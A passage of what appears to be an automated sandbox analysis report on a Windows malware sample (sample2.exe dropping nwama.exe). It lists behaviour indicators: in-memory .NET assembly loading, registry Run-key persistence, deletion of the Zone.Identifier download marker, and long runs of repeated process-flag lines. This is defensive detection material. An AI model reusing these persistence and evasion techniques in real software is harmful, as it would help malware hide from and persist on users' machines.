                  Source: 0.2.sample2.exe.590000.0.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.sample2.exe.590000.0.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: nwama.exe.1.dr, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 1.0.sample2.exe.ee0000.0.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 1.2.sample2.exe.ee0000.1.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 10.0.nwama.exe.7c0000.0.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 10.2.nwama.exe.7c0000.0.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.2.nwama.exe.ae0000.1.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.nwama.exe.ae0000.0.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 15.2.nwama.exe.8d0000.0.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 15.0.nwama.exe.8d0000.0.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 18.2.nwama.exe.520000.1.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 18.0.nwama.exe.520000.0.unpack, ClassCore.cs.Net Code: VanillaCore System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE8872 push cs; retf
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE8B24 push esp; retf
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0654B3E0 push es; retf
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06543E06 push es; ret
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06548575 pushfd ; ret
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05018872 push cs; retf
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_05018B24 push esp; retf
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062AB3E8 push es; retf
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_062A857B pushfd ; ret
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.05584068406
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.05584068406
                  Source: C:\Users\user\Desktop\sample2.exeFile created: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeJump to dropped file
                  Source: C:\Users\user\Desktop\sample2.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run nwamaJump to behavior
                  Source: C:\Users\user\Desktop\sample2.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run nwamaJump to behavior

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                  Source: C:\Users\user\Desktop\sample2.exeFile opened: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeFile opened: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\Desktop\sample2.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\sample2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeProcess information set: NOOPENFILEERRORBOX
